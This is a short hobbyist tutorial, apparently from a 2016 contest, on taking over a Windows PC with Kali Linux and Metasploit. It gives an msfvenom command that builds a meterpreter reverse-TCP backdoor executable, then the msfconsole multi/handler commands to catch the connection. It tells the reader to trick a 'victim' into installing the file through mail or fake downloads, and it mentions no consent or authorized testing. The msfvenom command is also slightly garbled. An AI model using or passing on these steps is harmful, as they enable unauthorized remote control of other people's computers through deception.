Introduction: Hack Windows PC Using Kali Linux

Today lets see how to hack Windows PC using Kali Linux

Step 1: Creating the Payload

To Hack Windows we need to create a payload that will act as a backdoor for us to get into that PC. To create payload for windows.

Open terminal and Type

msfvenom -p windows/meterpreter/reverse_tcp - platform windows-a x86 -f exe -o /root/Desktop/back.exe

Step 2: Starting the Metasploit Framework Console

For controlling the payload we need to start the Metasploit Framework Concole which is prebuilt in Kali Linux.

The Metasploit Framework Console has many payloads and many exploit method.

To start the Metasploit Framework Console. In the terminal type

msfconsole


Step 3: Choosing the Exploit Method

As I have said the Metasploit Framework Console has many exploitation method.

In this we will use the multi handler.

Type

use exploit/multi/handler


Step 4: Setting the Payload

In above step we set our exploitation method. In this step we need to specify the payload that we have created.

Type

set payload windows/meterpreter/reverse_tcp


Step 5: Providing Ip for Backdooring

In this step we need to provide the ip address of our machine so that the payload will connect to our system.

To find the ip address, open terminal and type ifconfig, and copy your ip address.

Then we have to set it in the msfconsole, so type

set LHOST (your ip address)

Step 6: Sending the File and Exploiting

After we have given all the information. We need to send the .exe file we created before to the victim via mail or fake downloads. make sure that the victim install the files.

After doing it, in the msfconsole command, type

exploit

After this command it will show you the victim terminal and you can control it.

Step 7: Watch the Video

You can watch the video for clarification

First Time Authors Contest 2016

Participated in the
First Time Authors Contest 2016